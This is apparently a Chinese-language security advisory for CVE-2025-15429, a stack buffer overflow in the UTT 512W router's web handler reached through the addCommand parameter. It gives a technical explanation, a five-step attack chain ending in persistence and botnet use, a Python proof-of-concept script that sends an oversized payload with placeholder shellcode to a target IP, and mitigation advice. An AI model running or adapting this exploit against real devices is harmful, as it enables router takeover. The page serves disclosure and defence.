CVE-2025-15429: UTT 512W路由器strcpy缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-15429

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

UTT 进取 512W 1.7.7-171114

漏洞概述

CVE-2025-15429是一个存在于UTT 进取 512W路由器固件版本1.7.7-171114中的高危安全漏洞。该漏洞位于Web管理界面的/goform/formConfigCliForEngineerOnly处理程序中，由于不安全的strcpy函数调用，导致攻击者可以通过addCommand参数注入超长字符串，从而触发缓冲区溢出。攻击者无需高权限即可发起攻击（低权限即可），且无需用户交互，可在网络环境中远程利用。CVSS评分8.8，属于高危漏洞。成功利用此漏洞可导致远程代码执行，攻击者可以完全控制路由器设备，执行任意命令、窃取敏感信息或将其纳入僵尸网络。该漏洞的利用代码已公开披露，厂商在收到通知后未做出任何响应或修复。

技术细节

该漏洞根源在于/goform/formConfigCliForEngineerOnly文件中对strcpy函数的不当使用。strcpy是一个不安全的字符串复制函数，它直接将源字符串复制到目标缓冲区而不进行边界检查，当源字符串长度超过目标缓冲区大小时，就会发生缓冲区溢出。在本案例中，addCommand参数被直接传递给strcpy函数，攻击者可以构造超长的字符串作为addCommand参数值。当HTTP请求到达服务器时，超长的addCommand值会被strcpy无限制地复制到固定大小的栈缓冲区中，覆盖相邻的栈内存区域，包括函数返回地址。通过精心构造溢出数据，攻击者可以覆盖返回地址，将程序执行流重定向到自己注入的恶意代码（shellcode），从而在路由器上实现远程代码执行。由于该路由器运行嵌入式Linux系统，攻击成功后攻击者将获得root权限，完全控制设备。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描互联网或内网中运行UTT 512W固件1.7.7-171114版本的路由器，发现Web管理界面可访问

STEP 2

步骤2

构造恶意请求：攻击者构造HTTP POST请求到/goform/formConfigCliForEngineerOnly端点，在addCommand参数中注入超长字符串（1000+字节）

STEP 3

步骤3

触发溢出：服务器处理请求时，strcpy函数将超长字符串复制到固定大小的栈缓冲区中，覆盖返回地址和关键寄存器

STEP 4

步骤4

代码执行：精心构造的溢出数据将程序执行流重定向到攻击者注入的shellcode，在路由器上以root权限执行任意命令

STEP 5

步骤5

持久化控制：攻击者可安装后门、修改防火墙规则、窃取网络流量或将被控设备加入僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15429 PoC - UTT 512W Buffer Overflow
# Target: UTT 进取 512W 1.7.7-171114
# Vulnerability: Buffer overflow in /goform/formConfigCliForEngineerOnly via addCommand parameter

def exploit(target_ip, target_port=80):
    """Exploit buffer overflow in UTT 512W router"""
    target_url = f"http://{target_ip}:{target_port}/goform/formConfigCliForEngineerOnly"
    
    # Generate payload with large string to overflow buffer
    # NOP sled + shellcode + return address
    padding = b"\x90" * 1000  # NOP sled
    shellcode = b"\xcc" * 200  # Placeholder shellcode (INT3 for debugging)
    ret_addr = b"\x42\x42\x42\x42"  # Target address (needs to be adjusted)
    
    payload = padding + shellcode + ret_addr
    
    # Send exploit request
    data = {
        'addCommand': payload.decode('latin-1')
    }
    
    try:
        print(f"[*] Sending exploit to {target_url}")
        print(f"[*] Payload length: {len(payload)} bytes")
        
        response = requests.post(target_url, data=data, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Exploit sent. Check device for crash or successful exploitation.")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

影响范围

UTT 进取 512W 固件版本 1.7.7-171114

防御指南

临时缓解措施

在厂商提供修复补丁之前，建议采取以下临时缓解措施：1) 禁用路由器的Web管理界面远程访问功能，仅允许通过LAN口本地管理；2) 在网络边界防火墙上屏蔽对路由器80/443端口的外部访问；3) 监控设备日志，关注异常的HTTP请求；4) 考虑使用VPN连接后再访问路由器管理界面；5) 定期检查设备状态和流量日志，及时发现异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15429
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15429
3 Details https://www.cvedetails.com/cve/CVE-2025-15429/
4 VulDB https://vuldb.com/cve/CVE-2025-15429
5 Link https://github.com/Lena-lyy/cve/blob/main/1223/19.md
6 Link https://github.com/Lena-lyy/cve/blob/main/1223/19.md#poc
7 Link https://vuldb.com/?ctiid.339351
8 Link https://vuldb.com/?id.339351
9 Link https://vuldb.com/?submit.721876